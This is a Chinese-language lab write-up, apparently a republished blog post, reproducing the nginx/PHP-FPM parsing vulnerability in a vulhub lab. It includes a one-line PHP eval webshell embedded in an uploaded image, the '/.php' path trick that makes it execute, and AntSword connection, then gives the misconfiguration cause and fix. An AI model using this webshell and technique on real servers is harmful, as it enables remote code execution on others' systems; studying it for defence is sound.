漏洞复现-nginx_parsing_vulnerability-nginx解析漏洞
2021/9/28 7:12:50
本文主要是介绍漏洞复现-nginx_parsing_vulnerability-nginx解析漏洞,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
0x00 实验环境
攻击机:Win 10
靶场:docker拉的vulhub靶场
0x01 影响版本
一些配置错误的情况,与nginx、php版本无关。
常常出现为nginx解析任意文件为php而导致解析漏洞。
0x02 漏洞复现
(1)上传一张正常的图片,然后在上传图片时进行抓包:
(2)如上图所示,在图片的数据报文中加入一句话木马:
<?php @eval($_POST['x']);?>
(3)上传完成后能看到图片上传的路径,点击访问,能成功访问到后,在图片文件名后加一个/.php
发现成功上传并成功解析为php文件。
(4)使用蚁剑直接连接即可:
0x03 漏洞原理
nginx.conf的如下配置导致nginx把以’.php’结尾的文件交给fastcgi处理,为此可以构造http://ip/uploadfiles/test.png/.php (url结尾不一定是‘.php’,任何服务器端不存在的php文件均可,比如’a.php’)。
如下图就是个错误的配置:
在这个www-2.conf的配置文件中,security.limit_extensions被设置为了空,故什么文件都是可以执行的,所以在防护的时候,需要将这个配置为.php(即:仅为.php的文件才能执行)。
0x04 修复建议
设置security.limit_extensions=.php,重启一下服务即可。
0x05 参考文献
https://www.cnblogs.com/renhaoblog/p/12874603.html
https://idc.wanyunshuju.com/aqld/1875.html
0x06 免责声明
本漏洞复现文章仅用于学习、工作与兴趣爱好,并立志为网络安全奉献一份力量,凡是利用本博客相关内容的无良hackers造成的安全事故均与本人无关!
这篇关于漏洞复现-nginx_parsing_vulnerability-nginx解析漏洞的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-10-29Nginx发布学习:从入门到实践的简单教程
- 2024-10-28Nginx发布:新手入门教程
- 2024-10-21nginx 怎么设置文件上传最大20M限制-icode9专业技术文章分享
- 2024-10-17关闭 nginx的命令是什么?-icode9专业技术文章分享
- 2024-09-17Nginx实用篇:实现负载均衡、限流与动静分离
- 2024-08-21宝塔nginx新增8022端口方法步骤-icode9专业技术文章分享
- 2024-08-21nginx配置,让ws升级为wss访问的方法步骤-icode9专业技术文章分享
- 2024-08-15nginx ws代理配置方法步骤-icode9专业技术文章分享
- 2024-08-14nginx 让访问带有/relid的地址返回404 ,例子 /relid-x-0.36-y-131.html-icode9专业技术文章分享
- 2024-08-14nginx 判断地址有/statics/的路径,指向到/home/html/statics/目录-icode9专业技术文章分享